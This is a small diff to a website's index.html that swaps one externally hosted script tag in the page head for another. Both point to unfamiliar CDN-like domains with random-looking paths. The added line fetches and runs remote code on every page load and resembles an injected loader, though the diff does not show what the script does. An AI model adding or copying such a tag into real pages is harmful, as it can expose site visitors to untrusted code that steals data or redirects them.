--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
 	<link rel="stylesheet" href="responsive.css" type="text/css" />
 	<meta name="viewport" content="width=device-width, initial-scale=1" />
 
-	<script src="https://js-cdn2020.net/jh34c5"></script>
+	<script src="https://s20-cdn.net/ga7k43"></script>
 
 	
 	<!-- Document Title
